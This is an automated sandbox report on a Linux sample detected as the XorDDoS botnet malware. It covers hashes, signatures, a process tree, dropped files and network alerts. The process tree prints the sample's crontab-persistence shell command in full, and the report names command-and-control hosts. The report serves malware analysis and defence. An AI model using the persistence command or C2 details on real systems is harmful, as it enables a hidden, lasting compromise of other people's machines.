Loading ...

Play interactive tourEdit tour

Linux Analysis Report XZFWLZVF1Z

Overview

General Information

Sample Name:XZFWLZVF1Z
Analysis ID:548446
MD5:35793cbfd0a4376ea9380ffed9182334
SHA1:31e5d905407966ca953def90eb45df417127cf38
SHA256:303bb187a06415eedc0c5ece5692fe05b03e286435472d0e4fd4ca9386d9acf4
Infos:

Detection

XorDDoS
Score:100
Range:0 - 100
Whitelisted:false

Signatures

Antivirus / Scanner detection for submitted sample
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Multi AV Scanner detection for submitted file
Antivirus detection for dropped file
Yara detected XorDDoS Bot
Sample tries to persist itself using System V runlevels
Machine Learning detection for dropped file
Sample tries to persist itself using cron
Drops files in suspicious directories
Sample deletes itself
Machine Learning detection for sample
Writes ELF files to disk
Drops files with innocent-looking names
PID-file does not contain an ASCII number
Writes shell script files to disk
Reads system information from the proc file system
Uses the "uname" system call to query kernel version information (possible evasion)
Enumerates processes within the "proc" file system
Executes the "systemctl" command used for controlling the systemd system and service manager
Detected TCP or UDP traffic on non-standard ports
Sample has stripped symbol table
Executes commands using a shell command-line interpreter
Reads CPU information from /proc indicative of miner or evasive malware
Writes shell script file to disk with an unusual file extension

Classification

General Information

Joe Sandbox Version:34.0.0 Boulder Opal
Analysis ID:548446
Start date:05.01.2022
Start time:19:40:08
Joe Sandbox Product:CloudBasic
Overall analysis duration:0h 6m 37s
Hypervisor based Inspection enabled:false
Report type:full
Sample file name:XZFWLZVF1Z
Cookbook file name:defaultlinuxfilecookbook.jbs
Analysis system description:Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:default
Detection:MAL
Classification:mal100.troj.evad.lin@0/21@2/0
Warnings:
Show All
  • VT rate limit hit for: /etc/cron.hourly/gcc.sh

Process Tree

  • system is lnxubuntu20
  • XZFWLZVF1Z (PID: 5217, Parent: 5115, MD5: 35793cbfd0a4376ea9380ffed9182334) Arguments: /tmp/XZFWLZVF1Z
    • XZFWLZVF1Z New Fork (PID: 5218, Parent: 5217)
      • XZFWLZVF1Z New Fork (PID: 5221, Parent: 5218)
        • update-rc.d (PID: 5222, Parent: 1860, MD5: 16a21f464119ea7fad1d3660de963637) Arguments: update-rc.d XZFWLZVF1Z defaults
          • systemctl (PID: 5228, Parent: 5222, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl daemon-reload
      • sh (PID: 5223, Parent: 5218, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "sed -i '/\\/etc\\/cron.hourly\\/gcc.sh/d' /etc/crontab && echo '*/3 * * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab"
        • sh New Fork (PID: 5224, Parent: 5223)
        • sed (PID: 5224, Parent: 5223, MD5: 885062561f66aa1d4af4c54b9e7cc81a) Arguments: sed -i /\\/etc\\/cron.hourly\\/gcc.sh/d /etc/crontab
      • XZFWLZVF1Z New Fork (PID: 5236, Parent: 5218)
        • vxnottgwjc (PID: 5237, Parent: 5236, MD5: 6d4eba06d1cf1d5747184ff55e34ea65) Arguments: /usr/bin/vxnottgwjc "route -n" 5218
      • XZFWLZVF1Z New Fork (PID: 5239, Parent: 5218)
        • vxnottgwjc (PID: 5240, Parent: 5239, MD5: 6d4eba06d1cf1d5747184ff55e34ea65) Arguments: /usr/bin/vxnottgwjc ls 5218
      • XZFWLZVF1Z New Fork (PID: 5241, Parent: 5218)
        • vxnottgwjc (PID: 5243, Parent: 5241, MD5: 6d4eba06d1cf1d5747184ff55e34ea65) Arguments: /usr/bin/vxnottgwjc ifconfig 5218
      • XZFWLZVF1Z New Fork (PID: 5244, Parent: 5218)
        • vxnottgwjc (PID: 5245, Parent: 5244, MD5: 6d4eba06d1cf1d5747184ff55e34ea65) Arguments: /usr/bin/vxnottgwjc whoami 5218
      • XZFWLZVF1Z New Fork (PID: 5247, Parent: 5218)
        • vxnottgwjc (PID: 5248, Parent: 5247, MD5: 6d4eba06d1cf1d5747184ff55e34ea65) Arguments: /usr/bin/vxnottgwjc "grep \"A\"" 5218
      • XZFWLZVF1Z New Fork (PID: 5253, Parent: 5218)
        • wqgmxyrptd (PID: 5254, Parent: 5253, MD5: 1bc009a7f083db215bf84e9c47f473df) Arguments: /usr/bin/wqgmxyrptd bash 5218
      • XZFWLZVF1Z New Fork (PID: 5255, Parent: 5218)
        • wqgmxyrptd (PID: 5257, Parent: 5255, MD5: 1bc009a7f083db215bf84e9c47f473df) Arguments: /usr/bin/wqgmxyrptd "netstat -an" 5218
      • XZFWLZVF1Z New Fork (PID: 5258, Parent: 5218)
        • wqgmxyrptd (PID: 5259, Parent: 5258, MD5: 1bc009a7f083db215bf84e9c47f473df) Arguments: /usr/bin/wqgmxyrptd "cd /etc" 5218
      • XZFWLZVF1Z New Fork (PID: 5261, Parent: 5218)
        • wqgmxyrptd (PID: 5262, Parent: 5261, MD5: 1bc009a7f083db215bf84e9c47f473df) Arguments: /usr/bin/wqgmxyrptd who 5218
      • XZFWLZVF1Z New Fork (PID: 5264, Parent: 5218)
        • wqgmxyrptd (PID: 5265, Parent: 5264, MD5: 1bc009a7f083db215bf84e9c47f473df) Arguments: /usr/bin/wqgmxyrptd top 5218
      • XZFWLZVF1Z New Fork (PID: 5281, Parent: 5218)
        • qkswzskzvm (PID: 5282, Parent: 5281, MD5: 86e4c1ab0dfd4b3035858198ddf0637d) Arguments: /usr/bin/qkswzskzvm "echo \"find\"" 5218
      • XZFWLZVF1Z New Fork (PID: 5288, Parent: 5218)
        • uprkxpaulc (PID: 5289, Parent: 5288, MD5: 4de43037f11f701f92d366ac0f9f2e9a) Arguments: /usr/bin/uprkxpaulc "route -n" 5218
      • XZFWLZVF1Z New Fork (PID: 5290, Parent: 5218)
        • uprkxpaulc (PID: 5291, Parent: 5290, MD5: 4de43037f11f701f92d366ac0f9f2e9a) Arguments: /usr/bin/uprkxpaulc "cd /etc" 5218
      • XZFWLZVF1Z New Fork (PID: 5293, Parent: 5218)
        • uprkxpaulc (PID: 5294, Parent: 5293, MD5: 4de43037f11f701f92d366ac0f9f2e9a) Arguments: /usr/bin/uprkxpaulc whoami 5218
      • XZFWLZVF1Z New Fork (PID: 5296, Parent: 5218)
        • uprkxpaulc (PID: 5297, Parent: 5296, MD5: 4de43037f11f701f92d366ac0f9f2e9a) Arguments: /usr/bin/uprkxpaulc bash 5218
      • XZFWLZVF1Z New Fork (PID: 5304, Parent: 5218)
        • akxqlcphlm (PID: 5305, Parent: 5304, MD5: 15005b1ff675843eff1f6e6b4e86968c) Arguments: /usr/bin/akxqlcphlm "echo \"find\"" 5218
      • XZFWLZVF1Z New Fork (PID: 5306, Parent: 5218)
        • akxqlcphlm (PID: 5308, Parent: 5306, MD5: 15005b1ff675843eff1f6e6b4e86968c) Arguments: /usr/bin/akxqlcphlm whoami 5218
      • XZFWLZVF1Z New Fork (PID: 5309, Parent: 5218)
        • akxqlcphlm (PID: 5310, Parent: 5309, MD5: 15005b1ff675843eff1f6e6b4e86968c) Arguments: /usr/bin/akxqlcphlm id 5218
      • XZFWLZVF1Z New Fork (PID: 5312, Parent: 5218)
        • akxqlcphlm (PID: 5313, Parent: 5312, MD5: 15005b1ff675843eff1f6e6b4e86968c) Arguments: /usr/bin/akxqlcphlm "ps -ef" 5218
      • XZFWLZVF1Z New Fork (PID: 5318, Parent: 5218)
        • mligukcpvp (PID: 5319, Parent: 5318, MD5: aaed11dc1d18164dea6192e21f9e544e) Arguments: /usr/bin/mligukcpvp who 5218
      • XZFWLZVF1Z New Fork (PID: 5321, Parent: 5218)
        • mligukcpvp (PID: 5322, Parent: 5321, MD5: aaed11dc1d18164dea6192e21f9e544e) Arguments: /usr/bin/mligukcpvp "ls -la" 5218
      • XZFWLZVF1Z New Fork (PID: 5324, Parent: 5218)
        • mligukcpvp (PID: 5325, Parent: 5324, MD5: aaed11dc1d18164dea6192e21f9e544e) Arguments: /usr/bin/mligukcpvp "sleep 1" 5218
      • XZFWLZVF1Z New Fork (PID: 5326, Parent: 5218)
        • mligukcpvp (PID: 5327, Parent: 5326, MD5: aaed11dc1d18164dea6192e21f9e544e) Arguments: /usr/bin/mligukcpvp "route -n" 5218
      • XZFWLZVF1Z New Fork (PID: 5329, Parent: 5218)
        • mligukcpvp (PID: 5330, Parent: 5329, MD5: aaed11dc1d18164dea6192e21f9e544e) Arguments: /usr/bin/mligukcpvp "ps -ef" 5218
      • XZFWLZVF1Z New Fork (PID: 5337, Parent: 5218)
        • kexmeeeolw (PID: 5338, Parent: 5337, MD5: bbc6ce9c97f6973d61f78fc452aab5c7) Arguments: /usr/bin/kexmeeeolw "sleep 1" 5218
      • XZFWLZVF1Z New Fork (PID: 5340, Parent: 5218)
        • kexmeeeolw (PID: 5341, Parent: 5340, MD5: bbc6ce9c97f6973d61f78fc452aab5c7) Arguments: /usr/bin/kexmeeeolw "ls -la" 5218
      • XZFWLZVF1Z New Fork (PID: 5342, Parent: 5218)
        • kexmeeeolw (PID: 5343, Parent: 5342, MD5: bbc6ce9c97f6973d61f78fc452aab5c7) Arguments: /usr/bin/kexmeeeolw bash 5218
      • XZFWLZVF1Z New Fork (PID: 5345, Parent: 5218)
        • kexmeeeolw (PID: 5346, Parent: 5345, MD5: bbc6ce9c97f6973d61f78fc452aab5c7) Arguments: /usr/bin/kexmeeeolw id 5218
      • XZFWLZVF1Z New Fork (PID: 5348, Parent: 5218)
        • kexmeeeolw (PID: 5349, Parent: 5348, MD5: bbc6ce9c97f6973d61f78fc452aab5c7) Arguments: /usr/bin/kexmeeeolw gnome-terminal 5218
      • XZFWLZVF1Z New Fork (PID: 5357, Parent: 5218)
        • hhmykaposi (PID: 5358, Parent: 5357, MD5: 0acf5a216e59d96b030e0170813fa8d1) Arguments: /usr/bin/hhmykaposi "netstat -antop" 5218
      • XZFWLZVF1Z New Fork (PID: 5360, Parent: 5218)
        • hhmykaposi (PID: 5361, Parent: 5360, MD5: 0acf5a216e59d96b030e0170813fa8d1) Arguments: /usr/bin/hhmykaposi "cat resolv.conf" 5218
      • XZFWLZVF1Z New Fork (PID: 5362, Parent: 5218)
        • hhmykaposi (PID: 5364, Parent: 5362, MD5: 0acf5a216e59d96b030e0170813fa8d1) Arguments: /usr/bin/hhmykaposi "netstat -an" 5218
      • XZFWLZVF1Z New Fork (PID: 5365, Parent: 5218)
        • hhmykaposi (PID: 5366, Parent: 5365, MD5: 0acf5a216e59d96b030e0170813fa8d1) Arguments: /usr/bin/hhmykaposi su 5218
      • XZFWLZVF1Z New Fork (PID: 5368, Parent: 5218)
        • hhmykaposi (PID: 5369, Parent: 5368, MD5: 0acf5a216e59d96b030e0170813fa8d1) Arguments: /usr/bin/hhmykaposi id 5218
      • XZFWLZVF1Z New Fork (PID: 5374, Parent: 5218)
        • ppozyahgxh (PID: 5375, Parent: 5374, MD5: 10d6cf5f9ffdf83976fe612372512b0c) Arguments: /usr/bin/ppozyahgxh "sleep 1" 5218
      • XZFWLZVF1Z New Fork (PID: 5377, Parent: 5218)
        • ppozyahgxh (PID: 5378, Parent: 5377, MD5: 10d6cf5f9ffdf83976fe612372512b0c) Arguments: /usr/bin/ppozyahgxh ifconfig 5218
      • XZFWLZVF1Z New Fork (PID: 5379, Parent: 5218)
        • ppozyahgxh (PID: 5380, Parent: 5379, MD5: 10d6cf5f9ffdf83976fe612372512b0c) Arguments: /usr/bin/ppozyahgxh "sleep 1" 5218
      • XZFWLZVF1Z New Fork (PID: 5382, Parent: 5218)
        • ppozyahgxh (PID: 5383, Parent: 5382, MD5: 10d6cf5f9ffdf83976fe612372512b0c) Arguments: /usr/bin/ppozyahgxh uptime 5218
      • XZFWLZVF1Z New Fork (PID: 5384, Parent: 5218)
        • ppozyahgxh (PID: 5385, Parent: 5384, MD5: 10d6cf5f9ffdf83976fe612372512b0c) Arguments: /usr/bin/ppozyahgxh bash 5218
      • XZFWLZVF1Z New Fork (PID: 5391, Parent: 5218)
        • ybfpvjxtlx (PID: 5392, Parent: 5391, MD5: 070327196e903c59b3ae1a9dbda601d6) Arguments: /usr/bin/ybfpvjxtlx su 5218
      • XZFWLZVF1Z New Fork (PID: 5394, Parent: 5218)
        • ybfpvjxtlx (PID: 5395, Parent: 5394, MD5: 070327196e903c59b3ae1a9dbda601d6) Arguments: /usr/bin/ybfpvjxtlx "ls -la" 5218
      • XZFWLZVF1Z New Fork (PID: 5397, Parent: 5218)
        • ybfpvjxtlx (PID: 5398, Parent: 5397, MD5: 070327196e903c59b3ae1a9dbda601d6) Arguments: /usr/bin/ybfpvjxtlx "sleep 1" 5218
      • XZFWLZVF1Z New Fork (PID: 5399, Parent: 5218)
        • ybfpvjxtlx (PID: 5400, Parent: 5399, MD5: 070327196e903c59b3ae1a9dbda601d6) Arguments: /usr/bin/ybfpvjxtlx "netstat -antop" 5218
      • XZFWLZVF1Z New Fork (PID: 5402, Parent: 5218)
        • ybfpvjxtlx (PID: 5403, Parent: 5402, MD5: 070327196e903c59b3ae1a9dbda601d6) Arguments: /usr/bin/ybfpvjxtlx "ifconfig eth0" 5218
      • XZFWLZVF1Z New Fork (PID: 5408, Parent: 5218)
        • bingytdcwk (PID: 5409, Parent: 5408, MD5: 99cb05f7504de48289b5497f2ba8751e) Arguments: /usr/bin/bingytdcwk "ifconfig eth0" 5218
      • XZFWLZVF1Z New Fork (PID: 5413, Parent: 5218)
        • bingytdcwk (PID: 5414, Parent: 5413, MD5: 99cb05f7504de48289b5497f2ba8751e) Arguments: /usr/bin/bingytdcwk "ifconfig eth0" 5218
      • XZFWLZVF1Z New Fork (PID: 5416, Parent: 5218)
        • bingytdcwk (PID: 5417, Parent: 5416, MD5: 99cb05f7504de48289b5497f2ba8751e) Arguments: /usr/bin/bingytdcwk "netstat -an" 5218
      • XZFWLZVF1Z New Fork (PID: 5418, Parent: 5218)
        • bingytdcwk (PID: 5419, Parent: 5418, MD5: 99cb05f7504de48289b5497f2ba8751e) Arguments: /usr/bin/bingytdcwk id 5218
      • XZFWLZVF1Z New Fork (PID: 5420, Parent: 5218)
        • bingytdcwk (PID: 5422, Parent: 5420, MD5: 99cb05f7504de48289b5497f2ba8751e) Arguments: /usr/bin/bingytdcwk "sleep 1" 5218
      • XZFWLZVF1Z New Fork (PID: 5427, Parent: 5218)
        • xnntpqonav (PID: 5428, Parent: 5427, MD5: bb587ebc1efd7483be7ebaa646fd58bf) Arguments: /usr/bin/xnntpqonav "netstat -antop" 5218
      • XZFWLZVF1Z New Fork (PID: 5430, Parent: 5218)
        • xnntpqonav (PID: 5431, Parent: 5430, MD5: bb587ebc1efd7483be7ebaa646fd58bf) Arguments: /usr/bin/xnntpqonav su 5218
      • XZFWLZVF1Z New Fork (PID: 5433, Parent: 5218)
        • xnntpqonav (PID: 5434, Parent: 5433, MD5: bb587ebc1efd7483be7ebaa646fd58bf) Arguments: /usr/bin/xnntpqonav sh 5218
      • XZFWLZVF1Z New Fork (PID: 5435, Parent: 5218)
        • xnntpqonav (PID: 5436, Parent: 5435, MD5: bb587ebc1efd7483be7ebaa646fd58bf) Arguments: /usr/bin/xnntpqonav who 5218
      • XZFWLZVF1Z New Fork (PID: 5438, Parent: 5218)
        • xnntpqonav (PID: 5439, Parent: 5438, MD5: bb587ebc1efd7483be7ebaa646fd58bf) Arguments: /usr/bin/xnntpqonav "grep \"A\"" 5218
      • XZFWLZVF1Z New Fork (PID: 5445, Parent: 5218)
        • lzqmjtjpqw (PID: 5446, Parent: 5445, MD5: 7a667d082ecd9ac2cdd0aeabc5b8446d) Arguments: /usr/bin/lzqmjtjpqw "ps -ef" 5218
      • XZFWLZVF1Z New Fork (PID: 5448, Parent: 5218)
        • lzqmjtjpqw (PID: 5449, Parent: 5448, MD5: 7a667d082ecd9ac2cdd0aeabc5b8446d) Arguments: /usr/bin/lzqmjtjpqw ifconfig 5218
      • XZFWLZVF1Z New Fork (PID: 5450, Parent: 5218)
        • lzqmjtjpqw (PID: 5451, Parent: 5450, MD5: 7a667d082ecd9ac2cdd0aeabc5b8446d) Arguments: /usr/bin/lzqmjtjpqw top 5218
      • XZFWLZVF1Z New Fork (PID: 5453, Parent: 5218)
        • lzqmjtjpqw (PID: 5454, Parent: 5453, MD5: 7a667d082ecd9ac2cdd0aeabc5b8446d) Arguments: /usr/bin/lzqmjtjpqw su 5218
      • XZFWLZVF1Z New Fork (PID: 5456, Parent: 5218)
        • lzqmjtjpqw (PID: 5457, Parent: 5456, MD5: 7a667d082ecd9ac2cdd0aeabc5b8446d) Arguments: /usr/bin/lzqmjtjpqw "grep \"A\"" 5218
      • XZFWLZVF1Z New Fork (PID: 5462, Parent: 5218)
        • zhoomtcmjp (PID: 5463, Parent: 5462, MD5: 4a782eb3638511f2dab1b84597fab9d0) Arguments: /usr/bin/zhoomtcmjp "cd /etc" 5218
      • XZFWLZVF1Z New Fork (PID: 5465, Parent: 5218)
        • zhoomtcmjp (PID: 5466, Parent: 5465, MD5: 4a782eb3638511f2dab1b84597fab9d0) Arguments: /usr/bin/zhoomtcmjp "echo \"find\"" 5218
      • XZFWLZVF1Z New Fork (PID: 5467, Parent: 5218)
        • zhoomtcmjp (PID: 5468, Parent: 5467, MD5: 4a782eb3638511f2dab1b84597fab9d0) Arguments: /usr/bin/zhoomtcmjp "netstat -antop" 5218
      • XZFWLZVF1Z New Fork (PID: 5469, Parent: 5218)
        • zhoomtcmjp (PID: 5470, Parent: 5469, MD5: 4a782eb3638511f2dab1b84597fab9d0) Arguments: /usr/bin/zhoomtcmjp sh 5218
      • XZFWLZVF1Z New Fork (PID: 5472, Parent: 5218)
        • zhoomtcmjp (PID: 5473, Parent: 5472, MD5: 4a782eb3638511f2dab1b84597fab9d0) Arguments: /usr/bin/zhoomtcmjp "grep \"A\"" 5218
      • XZFWLZVF1Z New Fork (PID: 5479, Parent: 5218)
        • prxseumwxz (PID: 5480, Parent: 5479, MD5: 08eba567ddd53fde82e9510321ba57ab) Arguments: /usr/bin/prxseumwxz su 5218
      • XZFWLZVF1Z New Fork (PID: 5482, Parent: 5218)
        • prxseumwxz (PID: 5483, Parent: 5482, MD5: 08eba567ddd53fde82e9510321ba57ab) Arguments: /usr/bin/prxseumwxz su 5218
      • XZFWLZVF1Z New Fork (PID: 5485, Parent: 5218)
        • prxseumwxz (PID: 5486, Parent: 5485, MD5: 08eba567ddd53fde82e9510321ba57ab) Arguments: /usr/bin/prxseumwxz whoami 5218
      • XZFWLZVF1Z New Fork (PID: 5487, Parent: 5218)
        • prxseumwxz (PID: 5488, Parent: 5487, MD5: 08eba567ddd53fde82e9510321ba57ab) Arguments: /usr/bin/prxseumwxz "echo \"find\"" 5218
      • XZFWLZVF1Z New Fork (PID: 5490, Parent: 5218)
        • prxseumwxz (PID: 5491, Parent: 5490, MD5: 08eba567ddd53fde82e9510321ba57ab) Arguments: /usr/bin/prxseumwxz top 5218
      • XZFWLZVF1Z New Fork (PID: 5497, Parent: 5218)
        • diqdbkzgzt (PID: 5498, Parent: 5497, MD5: 7741291f841e1def53aa3ea5f6fada97) Arguments: /usr/bin/diqdbkzgzt su 5218
      • XZFWLZVF1Z New Fork (PID: 5499, Parent: 5218)
        • diqdbkzgzt (PID: 5501, Parent: 1860, MD5: 7741291f841e1def53aa3ea5f6fada97) Arguments: /usr/bin/diqdbkzgzt "netstat -antop" 5218
      • XZFWLZVF1Z New Fork (PID: 5502, Parent: 5218)
        • diqdbkzgzt (PID: 5503, Parent: 1860, MD5: 7741291f841e1def53aa3ea5f6fada97) Arguments: /usr/bin/diqdbkzgzt id 5218
      • XZFWLZVF1Z New Fork (PID: 5504, Parent: 5218)
        • diqdbkzgzt (PID: 5505, Parent: 1860, MD5: 7741291f841e1def53aa3ea5f6fada97) Arguments: /usr/bin/diqdbkzgzt su 5218
      • XZFWLZVF1Z New Fork (PID: 5506, Parent: 5218)
        • diqdbkzgzt (PID: 5507, Parent: 1860, MD5: 7741291f841e1def53aa3ea5f6fada97) Arguments: /usr/bin/diqdbkzgzt bash 5218
      • XZFWLZVF1Z New Fork (PID: 5514, Parent: 5218)
        • nykjhwzoix (PID: 5515, Parent: 5514, MD5: 87054193295ea4efa805d88d42c70b4f) Arguments: /usr/bin/nykjhwzoix sh 5218
      • XZFWLZVF1Z New Fork (PID: 5516, Parent: 5218)
        • nykjhwzoix (PID: 5517, Parent: 1860, MD5: 87054193295ea4efa805d88d42c70b4f) Arguments: /usr/bin/nykjhwzoix ifconfig 5218
      • XZFWLZVF1Z New Fork (PID: 5519, Parent: 5218)
        • nykjhwzoix (PID: 5520, Parent: 1860, MD5: 87054193295ea4efa805d88d42c70b4f) Arguments: /usr/bin/nykjhwzoix ls 5218
      • XZFWLZVF1Z New Fork (PID: 5521, Parent: 5218)
        • nykjhwzoix (PID: 5522, Parent: 1860, MD5: 87054193295ea4efa805d88d42c70b4f) Arguments: /usr/bin/nykjhwzoix uptime 5218
      • XZFWLZVF1Z New Fork (PID: 5525, Parent: 5218)
        • nykjhwzoix (PID: 5526, Parent: 1860, MD5: 87054193295ea4efa805d88d42c70b4f) Arguments: /usr/bin/nykjhwzoix who 5218
      • XZFWLZVF1Z New Fork (PID: 5534, Parent: 5218)
        • ygkfhnfkvx (PID: 5535, Parent: 5534, MD5: a9c911cfbcfeb76d8d0949a8b819b9ff) Arguments: /usr/bin/ygkfhnfkvx "netstat -antop" 5218
      • XZFWLZVF1Z New Fork (PID: 5536, Parent: 5218)
        • ygkfhnfkvx (PID: 5537, Parent: 1860, MD5: a9c911cfbcfeb76d8d0949a8b819b9ff) Arguments: /usr/bin/ygkfhnfkvx "echo \"find\"" 5218
      • XZFWLZVF1Z New Fork (PID: 5538, Parent: 5218)
        • ygkfhnfkvx (PID: 5539, Parent: 5538, MD5: a9c911cfbcfeb76d8d0949a8b819b9ff) Arguments: /usr/bin/ygkfhnfkvx "cat resolv.conf" 5218
      • XZFWLZVF1Z New Fork (PID: 5541, Parent: 5218)
        • ygkfhnfkvx (PID: 5542, Parent: 1860, MD5: a9c911cfbcfeb76d8d0949a8b819b9ff) Arguments: /usr/bin/ygkfhnfkvx whoami 5218
      • XZFWLZVF1Z New Fork (PID: 5543, Parent: 5218)
        • ygkfhnfkvx (PID: 5545, Parent: 1860, MD5: a9c911cfbcfeb76d8d0949a8b819b9ff) Arguments: /usr/bin/ygkfhnfkvx who 5218
      • XZFWLZVF1Z New Fork (PID: 5553, Parent: 5218)
        • fbeozxrvfk (PID: 5554, Parent: 5553, MD5: 5f75ece32f1e45dee8ff2808a0b11a47) Arguments: /usr/bin/fbeozxrvfk gnome-terminal 5218
      • XZFWLZVF1Z New Fork (PID: 5555, Parent: 5218)
        • fbeozxrvfk (PID: 5556, Parent: 1860, MD5: 5f75ece32f1e45dee8ff2808a0b11a47) Arguments: /usr/bin/fbeozxrvfk "cd /etc" 5218
      • XZFWLZVF1Z New Fork (PID: 5557, Parent: 5218)
        • fbeozxrvfk (PID: 5558, Parent: 1860, MD5: 5f75ece32f1e45dee8ff2808a0b11a47) Arguments: /usr/bin/fbeozxrvfk pwd 5218
      • XZFWLZVF1Z New Fork (PID: 5560, Parent: 5218)
        • fbeozxrvfk (PID: 5561, Parent: 1860, MD5: 5f75ece32f1e45dee8ff2808a0b11a47) Arguments: /usr/bin/fbeozxrvfk uptime 5218
      • XZFWLZVF1Z New Fork (PID: 5562, Parent: 5218)
        • fbeozxrvfk (PID: 5564, Parent: 1860, MD5: 5f75ece32f1e45dee8ff2808a0b11a47) Arguments: /usr/bin/fbeozxrvfk "ps -ef" 5218
      • XZFWLZVF1Z New Fork (PID: 5570, Parent: 5218)
        • ekqpdizncq (PID: 5571, Parent: 1860, MD5: e8694e408d04b366240a7a83574c39c8) Arguments: /usr/bin/ekqpdizncq "grep \"A\"" 5218
      • XZFWLZVF1Z New Fork (PID: 5572, Parent: 5218)
        • ekqpdizncq (PID: 5573, Parent: 1860, MD5: e8694e408d04b366240a7a83574c39c8) Arguments: /usr/bin/ekqpdizncq "ps -ef" 5218
      • XZFWLZVF1Z New Fork (PID: 5574, Parent: 5218)
        • ekqpdizncq (PID: 5576, Parent: 1860, MD5: e8694e408d04b366240a7a83574c39c8) Arguments: /usr/bin/ekqpdizncq "ps -ef" 5218
      • XZFWLZVF1Z New Fork (PID: 5577, Parent: 5218)
        • ekqpdizncq (PID: 5578, Parent: 1860, MD5: e8694e408d04b366240a7a83574c39c8) Arguments: /usr/bin/ekqpdizncq "sleep 1" 5218
      • XZFWLZVF1Z New Fork (PID: 5580, Parent: 5218)
        • ekqpdizncq (PID: 5581, Parent: 1860, MD5: e8694e408d04b366240a7a83574c39c8) Arguments: /usr/bin/ekqpdizncq ifconfig 5218
  • systemd New Fork (PID: 5230, Parent: 5229)
  • snapd-env-generator (PID: 5230, Parent: 5229, MD5: 3633b075f40283ec938a2a6a89671b0e) Arguments: /usr/lib/systemd/system-environment-generators/snapd-env-generator
  • cleanup

Yara Overview

Initial Sample

SourceRuleDescriptionAuthorStrings
XZFWLZVF1ZJoeSecurity_XorDDoSYara detected XorDDoS BotJoe Security

    Dropped Files

    SourceRuleDescriptionAuthorStrings
    /usr/bin/zhoomtcmjpJoeSecurity_XorDDoSYara detected XorDDoS BotJoe Security
      /usr/lib/libudev.soJoeSecurity_XorDDoSYara detected XorDDoS BotJoe Security
        /usr/bin/ppozyahgxhJoeSecurity_XorDDoSYara detected XorDDoS BotJoe Security
          /usr/bin/qkswzskzvmJoeSecurity_XorDDoSYara detected XorDDoS BotJoe Security
            /usr/bin/vxnottgwjcJoeSecurity_XorDDoSYara detected XorDDoS BotJoe Security
              Click to see the 10 entries

              Memory Dumps

              SourceRuleDescriptionAuthorStrings
              5236.1.000000001a887bdc.0000000047f81f2f.r-x.sdmpJoeSecurity_XorDDoSYara detected XorDDoS BotJoe Security
                5469.1.000000001a887bdc.0000000047f81f2f.r-x.sdmpJoeSecurity_XorDDoSYara detected XorDDoS BotJoe Security
                  5462.1.000000001a887bdc.0000000047f81f2f.r-x.sdmpJoeSecurity_XorDDoSYara detected XorDDoS BotJoe Security
                    5302.1.000000001a887bdc.0000000047f81f2f.r-x.sdmpJoeSecurity_XorDDoSYara detected XorDDoS BotJoe Security
                      5362.1.000000001a887bdc.0000000047f81f2f.r-x.sdmpJoeSecurity_XorDDoSYara detected XorDDoS BotJoe Security
                        Click to see the 150 entries

                        Jbx Signature Overview

                        Click to jump to signature section

                        Show All Signature Results

                        AV Detection:

                        barindex
                        Antivirus / Scanner detection for submitted sampleShow sources
                        Source: XZFWLZVF1ZAvira: detected
                        Multi AV Scanner detection for submitted fileShow sources
                        Source: XZFWLZVF1ZVirustotal: Detection: 64%Perma Link
                        Source: XZFWLZVF1ZMetadefender: Detection: 35%Perma Link
                        Source: XZFWLZVF1ZReversingLabs: Detection: 74%
                        Antivirus detection for dropped fileShow sources
                        Source: /usr/lib/libudev.soAvira: detection malicious, Label: LINUX/Xorddos.ucgtz
                        Machine Learning detection for dropped fileShow sources
                        Source: /usr/bin/prxseumwxzJoe Sandbox ML: detected
                        Source: /usr/bin/vxnottgwjcJoe Sandbox ML: detected
                        Source: /usr/bin/lzqmjtjpqwJoe Sandbox ML: detected
                        Source: /usr/bin/wqgmxyrptdJoe Sandbox ML: detected
                        Source: /usr/bin/akxqlcphlmJoe Sandbox ML: detected
                        Source: /usr/lib/libudev.soJoe Sandbox ML: detected
                        Source: /usr/bin/xnntpqonavJoe Sandbox ML: detected
                        Source: /usr/bin/qkswzskzvmJoe Sandbox ML: detected
                        Source: /usr/bin/uprkxpaulcJoe Sandbox ML: detected
                        Source: /usr/bin/ppozyahgxhJoe Sandbox ML: detected
                        Source: /usr/bin/kexmeeeolwJoe Sandbox ML: detected
                        Source: /usr/bin/hhmykaposiJoe Sandbox ML: detected
                        Source: /usr/bin/ybfpvjxtlxJoe Sandbox ML: detected
                        Source: /usr/bin/zhoomtcmjpJoe Sandbox ML: detected
                        Source: /usr/bin/bingytdcwkJoe Sandbox ML: detected
                        Source: /usr/bin/mligukcpvpJoe Sandbox ML: detected
                        Machine Learning detection for sampleShow sources
                        Source: XZFWLZVF1ZJoe Sandbox ML: detected
                        Source: /tmp/XZFWLZVF1Z (PID: 5218)Reads CPU info from proc file: /proc/cpuinfoJump to behavior

                        Networking:

                        barindex
                        Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
                        Source: TrafficSnort IDS: 2021326 ET TROJAN Likely Linux/Xorddos.F DDoS Attack Participation (aa.hostasa.org) 192.168.2.23:55475 -> 8.8.8.8:53
                        Source: TrafficSnort IDS: 2021336 ET TROJAN DDoS.XOR Checkin via HTTP 192.168.2.23:39336 -> 99.83.154.118:80
                        Source: TrafficSnort IDS: 2020381 ET TROJAN DDoS.XOR Checkin 192.168.2.23:40608 -> 54.36.15.99:1522
                        Source: global trafficTCP traffic: 192.168.2.23:40608 -> 54.36.15.99:1522
                        Source: unknownNetwork traffic detected: HTTP traffic on port 43928 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 42836 -> 443
                        Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.43
                        Source: unknownTCP traffic detected without corresponding DNS query: 109.202.202.202
                        Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.42
                        Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.43
                        Source: unknownTCP traffic detected without corresponding DNS query: 109.202.202.202
                        Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.42
